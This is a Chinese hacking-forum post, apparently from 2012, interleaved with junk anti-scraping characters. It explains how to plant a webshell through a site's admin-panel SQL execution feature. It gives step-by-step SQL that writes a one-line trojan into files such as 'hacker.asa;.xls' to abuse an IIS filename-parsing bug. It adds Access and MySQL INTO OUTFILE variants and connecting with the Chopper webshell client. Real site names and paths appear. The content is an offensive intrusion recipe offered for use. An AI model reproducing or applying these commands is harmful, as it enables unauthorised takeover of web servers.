好不容易进了后台,发现啥上传啊。备份啊多木有。: Z, O' e9 R5 H- U9 ~9 Z$ f2 ]+ X
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
0 Z% r+ C, E% i' g文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,: G+ v0 ?* e' }# Q& l8 X) u
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:% a4 }, N: A. Q/ u' ]% [( G
1.create table cmd (a varchar(50))2 X, n3 w$ _. P/ V7 D2 q
2.insert into cmd (a) values (‘‘)+ V; P5 Z: R9 z/ y( u
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd _' P! ~# o1 A2 q
(把表cmd的内容导出为物理路径的一个EXCEL文件)8 n: B, \ C9 O! g4 Y
4.drop table cmd
% z1 l8 v$ F* g% r4 C# g2 B利用IIS的BUG成功拿到了WEBSHELL。+ ^/ _7 z6 L/ I- k6 {
" d2 B y3 j7 A# o; v5 j6 |$ j+ [ c直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话 I) l6 |' R1 B; n0 m# C4 v3 W
6 X, \3 |5 L! v0 I) ?; K1 ^0 C SQL语句意思解释:8 `7 x5 p3 v7 m+ z
第一句2 _- e7 ]: D* W% c
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为504 z. [+ M; }! r. v* j" G$ r1 k
* b- T D$ J7 P8 ?
第二句
5 `9 y5 s( a! s1 X4 S7 z 在表cmd的a字段插入一句话木马1 ?' \, B2 n6 w5 m# J
第三句% H2 c) A# f, m! c2 c- q
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
2 K/ E. s& y4 f/ D
" p- F9 \) t. y 第四句
# a8 s6 F3 {2 y, _3 t) W 删除建立的cmd表* z5 r9 V+ d% p! k; d8 Y; V, t/ l
* u5 d5 i3 @: \
以下内容为测试:
' _4 r3 v( P* J( I Access利用后台SQL执行命令功能导出WebShell:
. I( X9 |3 g3 ^ 这个更简单:$ b S6 r# Q$ |1 f
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
6 p) R' |* F1 U; | 或者
; k2 ?. ?" j) T0 m: }$ T [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]$ Z- ]6 {* o3 u- I
& b: e+ ]& A+ `, m% ? [6 U 后台有执行SQL语句功能(vote为已知表段)" ]1 C" u. M$ G: C
希望对大家有所帮助拿shell的又一个思路1 u& ]# F9 T* L. T: T6 y9 J) J5 _
|
发表于 2012-9-13 17:53:58
收藏
支持
反对